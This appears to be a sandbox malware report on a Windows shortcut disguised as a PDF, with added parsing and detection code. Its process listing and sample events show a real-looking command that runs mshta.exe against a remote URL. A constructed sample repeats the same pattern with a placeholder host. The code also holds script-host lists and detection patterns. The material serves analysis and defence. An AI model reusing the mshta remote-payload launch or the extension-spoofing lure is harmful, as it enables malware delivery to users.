Analysis

  • max time kernel
    110s
  • max time network
    118s
  • platform
    windows10_x64
  • resource
    win10-en-20211014
  • submitted
    29-10-2021 05:08

General

  • Target

    Exchange Project Management Plan_Q3.2021.pdf.lnk

  • Size

    1.3MB

  • MD5

    4b9366f2dcab60d56d09e69e21d77d91

  • SHA1

    a46318a25582c2616f33f49f7af986137637ba1d

  • SHA256

    51eaf8af57211f8d9e534f98413e71f4ddf5abcce806a111fc49a30d3bcec696

  • SHA512

    4b1bdfe4d09ed047122824536e5a1f59d533c8e1780a2cbab84398a8a1ba838de916ca99234b055a49e956d9fc539a961665764a3b89dc0d6736b8d6ce1b5d04
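
The target is a Windows shortcut (.lnk) whose name ends in ".pdf.lnk", the usual trick of hiding the real extension behind a document one. A shortcut's target and arguments live in the MS-SHLLINK StringData section, which is what an analyst extracts first. The following parser and triage routine is an added example, not code from the tria.ge report or from the analysed sample: the shortcut bytes are constructed in memory with build_lnk() to mirror the kind of target/argument pair that would produce the cmd.exe -> mshta.exe chain listed under Processes, the real shortcut was not available to this page, and the URL in the constructed sample is a placeholder (example.invalid), not the report's IoC. Flag names and offsets follow the MS-SHLLINK specification.

```python
"""Extract and triage the StringData of an MS-SHLLINK (.lnk) shortcut.

Added example, not code from the tria.ge report or the analysed sample.
The shortcut bytes are CONSTRUCTED with build_lnk(); the URL is a placeholder.
"""
import re
import struct

# LinkFlags bits (MS-SHLLINK 2.1.1)
HAS_LINK_TARGET_ID_LIST = 0x01
HAS_LINK_INFO = 0x02
HAS_NAME = 0x04
HAS_RELATIVE_PATH = 0x08
HAS_WORKING_DIR = 0x10
HAS_ARGUMENTS = 0x20
HAS_ICON_LOCATION = 0x40
IS_UNICODE = 0x80
STRING_FIELDS = (
    (HAS_NAME, "name"), (HAS_RELATIVE_PATH, "relative_path"),
    (HAS_WORKING_DIR, "working_dir"), (HAS_ARGUMENTS, "arguments"),
    (HAS_ICON_LOCATION, "icon_location"),
)
# LinkCLSID {00021401-0000-0000-C000-000000000046} in little-endian GUID layout
LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")
SW_SHOWMINNOACTIVE = 7  # ShowCommand value that keeps the console window out of sight

def parse_lnk(data: bytes) -> dict:
    """Walk ShellLinkHeader -> (IDList) -> (LinkInfo) -> StringData and return the strings."""
    if len(data) < 0x4C or struct.unpack_from("<I", data, 0)[0] != 0x4C:
        raise ValueError("not a ShellLinkHeader (HeaderSize must be 0x4C)")
    if data[4:20] != LNK_CLSID:
        raise ValueError("LinkCLSID mismatch")
    flags = struct.unpack_from("<I", data, 20)[0]
    out = {"flags": flags, "show_command": struct.unpack_from("<I", data, 60)[0]}
    pos = 0x4C
    if flags & HAS_LINK_TARGET_ID_LIST:          # IDListSize (2 bytes) + IDList
        pos += 2 + struct.unpack_from("<H", data, pos)[0]
    if flags & HAS_LINK_INFO:                    # LinkInfoSize counts the whole structure
        pos += struct.unpack_from("<I", data, pos)[0]
    for bit, key in STRING_FIELDS:               # CountCharacters (2 bytes) + characters
        if not flags & bit:
            continue
        count = struct.unpack_from("<H", data, pos)[0]
        pos += 2
        if flags & IS_UNICODE:
            out[key] = data[pos:pos + 2 * count].decode("utf-16-le")
            pos += 2 * count
        else:
            out[key] = data[pos:pos + count].decode("cp1252", "replace")
            pos += count
    return out

def build_lnk(relative_path: str, arguments: str, show_command: int = 1) -> bytes:
    """Construct a minimal Unicode shortcut (no IDList/LinkInfo) for testing the parser."""
    flags = HAS_RELATIVE_PATH | HAS_ARGUMENTS | IS_UNICODE
    # HeaderSize, CLSID, LinkFlags, FileAttributes, 3x FILETIME, FileSize, IconIndex,
    # ShowCommand, HotKey, Reserved1, Reserved2, Reserved3
    header = struct.pack("<I16sIIqqqIIIHHII", 0x4C, LNK_CLSID, flags,
                         0, 0, 0, 0, 0, 0, show_command, 0, 0, 0, 0)
    def sd(s):  # StringData entry: CountCharacters + UTF-16LE chars, no NUL terminator
        return struct.pack("<H", len(s)) + s.encode("utf-16-le")
    return header + sd(relative_path) + sd(arguments) + struct.pack("<I", 0)  # TerminalBlock

SCRIPT_HOSTS = {"cmd", "mshta", "powershell", "pwsh", "wscript", "cscript",
                "rundll32", "regsvr32", "certutil", "bitsadmin", "msiexec"}
DOUBLE_EXT = re.compile(r"\.(pdf|docx?|xlsx?|pptx?|txt|jpe?g|png)\.lnk$", re.I)

def triage(fields: dict, filename: str) -> list:
    """Return the reasons a shortcut looks like an initial-access lure (empty if none)."""
    findings, found = [], []
    target = fields.get("relative_path", "") + " " + fields.get("arguments", "")
    for tok in target.split():
        base = tok.rsplit("\\", 1)[-1].lower()
        base = base[:-4] if base.endswith(".exe") else base
        if base in SCRIPT_HOSTS and base not in found:
            found.append(base)
    if found:
        findings.append("target/arguments invoke script host(s): " + ", ".join(found))
    if re.search(r"https?://", fields.get("arguments", ""), re.I):
        findings.append("arguments contain a URL (remote payload staging)")
    if DOUBLE_EXT.search(filename):
        findings.append("document extension spoofing: " + filename.rsplit("\\", 1)[-1])
    if fields.get("show_command") == SW_SHOWMINNOACTIVE:
        findings.append("ShowCommand=SW_SHOWMINNOACTIVE (window hidden from the user)")
    return findings

SAMPLE_NAME = "Exchange Project Management Plan_Q3.2021.pdf.lnk"  # file name from the report
SAMPLE_LNK = build_lnk(                                           # constructed, not the real file
    r"..\..\..\..\Windows\System32\cmd.exe",
    r"/c start /b C:\Windows\System32\mshta https://example.invalid/stage.hta",  # placeholder URL
    show_command=SW_SHOWMINNOACTIVE,
)

if __name__ == "__main__":
    fields = parse_lnk(SAMPLE_LNK)
    print(fields["relative_path"], fields["arguments"])
    for line in triage(fields, SAMPLE_NAME):
        print(" -", line)
```

On a real sample, read the file bytes and pass them to parse_lnk(); the relative path is often a "..\..\..\" walk to System32 so the shortcut resolves regardless of where the victim saved it, and the arguments carry the actual command. Real shortcuts usually also contain a LinkTargetIDList and ExtraData (including a TrackerDataBlock with the author's machine ID), which this minimal parser skips but a full forensic tool should dump.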

Score
8/10

Malware Config

Signatures

  • Blocklisted process makes network request (3 IoCs)

    mshta.exe (PID 3508) was launched with an https:// URL and made a network request to docs.gsheetpage.com (see Processes). mshta.exe is a signed Windows binary that executes whatever HTML Application the URL returns, so a user-session mshta.exe with a remote URL on its command line is a high-confidence initial-access indicator, not sandbox noise.

  • Enumerates physical storage devices (1 TTP)

    Attempts to interact with connected storage/optical drive(s). The sandbox labels this likely ransomware behaviour, but it is a generic heuristic; this report records no dropped files and no file-encryption activity, so treat it as a weak signal until the fetched HTA itself is analysed.

  • Suspicious use of WriteProcessMemory (4 IoCs)

    Raised on both cmd.exe instances (PIDs 2840 and 2852). Writing into a freshly created child process is a normal side effect of process creation, so on its own this does not indicate code injection; the network request above is the behaviour that matters in this run.

Processes

  • C:\Windows\system32\cmd.exe (PID 2840, depth 1)
    cmd /c "C:\Users\Admin\AppData\Local\Temp\Exchange Project Management Plan_Q3.2021.pdf.lnk"
    • Suspicious use of WriteProcessMemory
    • C:\Windows\System32\cmd.exe (PID 2852, depth 2)
      "C:\Windows\System32\cmd.exe" /c start /b C:\Windows\System32\mshta https://docs.gsheetpage.com/oqkoB0q32czSiIjgsw+S2lfzfm4dB3TLnrpSTyuEIxI=
      • Suspicious use of WriteProcessMemory
      • C:\Windows\System32\mshta.exe (PID 3508, depth 3)
        C:\Windows\System32\mshta https://docs.gsheetpage.com/oqkoB0q32czSiIjgsw+S2lfzfm4dB3TLnrpSTyuEIxI=
        • Blocklisted process makes network request
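
The process tree is the detection opportunity: a shortcut opened by the user yields cmd.exe, which uses "start /b" to background a second cmd.exe that runs mshta.exe with a remote URL. The following detector is an added example, not part of the tria.ge report. EVENTS is a constructed set of Sysmon Event ID 1 style process-creation records that mirrors the tree above (PIDs 2840 -> 2852 -> 3508, with the report's URL as the IoC) plus one benign local HTA launch that must not alert; the field names and the parent PID of the root cmd.exe are assumptions, not exported telemetry.

```python
"""Detect the LNK -> cmd.exe 'start /b' -> mshta.exe <URL> chain in process events.

Added example, not part of the tria.ge report. EVENTS is CONSTRUCTED to mirror
the report's process tree; field names and the root parent PID are assumptions.
"""
import re

URL_RE = re.compile(r"https?://[^\s\"']+", re.I)
SCRIPT_HOSTS = {"mshta.exe", "wscript.exe", "cscript.exe", "powershell.exe",
                "pwsh.exe", "rundll32.exe", "regsvr32.exe"}
# 'start /b' and 'start /min' background the child so no console window is shown to the user
START_HIDDEN_RE = re.compile(r"\bstart\b[^&|]*\s/(b|min)\b", re.I)

EVENTS = [  # constructed; mirrors the Processes section of the report
    {"pid": 2840, "ppid": 1000, "image": r"C:\Windows\system32\cmd.exe",
     "cmdline": r'cmd /c "C:\Users\Admin\AppData\Local\Temp\Exchange Project Management Plan_Q3.2021.pdf.lnk"'},
    {"pid": 2852, "ppid": 2840, "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r'"C:\Windows\System32\cmd.exe" /c start /b C:\Windows\System32\mshta https://docs.gsheetpage.com/oqkoB0q32czSiIjgsw+S2lfzfm4dB3TLnrpSTyuEIxI='},
    {"pid": 3508, "ppid": 2852, "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": r"C:\Windows\System32\mshta https://docs.gsheetpage.com/oqkoB0q32czSiIjgsw+S2lfzfm4dB3TLnrpSTyuEIxI="},
    # Benign control: a vendor help file opened from disk must not alert
    {"pid": 4100, "ppid": 1000, "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": r'mshta.exe "C:\Program Files\Vendor\help.hta"'},
]

def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def lineage(pid: int, by_pid: dict) -> list:
    """Return [process, parent, grandparent, ...] as far as the available events allow."""
    chain, seen = [], set()
    while pid in by_pid and pid not in seen:  # 'seen' guards against PID-reuse loops
        seen.add(pid)
        chain.append(by_pid[pid])
        pid = by_pid[pid]["ppid"]
    return chain

def detect(events: list) -> list:
    """Apply three rules to every script-host process and return the findings."""
    by_pid = {e["pid"]: e for e in events}
    findings = []
    for e in events:
        if basename(e["image"]) not in SCRIPT_HOSTS:
            continue
        chain = lineage(e["pid"], by_pid)
        ancestors = chain[1:]
        # Rule 1: script host handed an http(s) URL -> remote HTA/script staging
        urls = URL_RE.findall(e["cmdline"])
        if urls:
            findings.append({"pid": e["pid"], "rule": "scripthost_remote_url", "url": urls[0]})
        # Rule 2: an ancestor cmd.exe used 'start /b' or 'start /min' to hide the launch
        if any(basename(p["image"]) == "cmd.exe" and START_HIDDEN_RE.search(p["cmdline"])
               for p in ancestors):
            findings.append({"pid": e["pid"], "rule": "cmd_start_hidden_scripthost",
                             "chain": " -> ".join(basename(p["image"]) for p in reversed(chain))})
        # Rule 3: a .lnk path appears in the ancestry. Present here because the sandbox
        # launched the shortcut via cmd /c; in the wild the parent is usually explorer.exe,
        # so treat this as corroboration rather than a requirement.
        lnks = [p for p in ancestors if ".lnk" in p["cmdline"].lower()]
        if lnks:
            findings.append({"pid": e["pid"], "rule": "scripthost_from_lnk_ancestor",
                             "lnk_cmdline": lnks[0]["cmdline"]})
    return findings

if __name__ == "__main__":
    for f in detect(EVENTS):
        print(f)
```

Rule 1 alone would catch this sample and is the one worth deploying broadly: mshta.exe with a URL argument is rare in legitimate use, while rules 2 and 3 add context for triage. Expect the lineage walk to be truncated on real telemetry when the parent started before logging did, which is why each rule is evaluated independently rather than requiring the full chain.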

Network

MITRE ATT&CK Matrix (ATT&CK v6)

  • Discovery: System Information Discovery (T1082), 1 hit


Downloads

  • memory/2852-118-0x0000000000000000-mapping.dmp
  • memory/3508-119-0x0000000000000000-mapping.dmp
  • memory/3508-120-0x0000020C34B68000-0x0000020C34B70000-memory.dmp
    Filesize

    32KB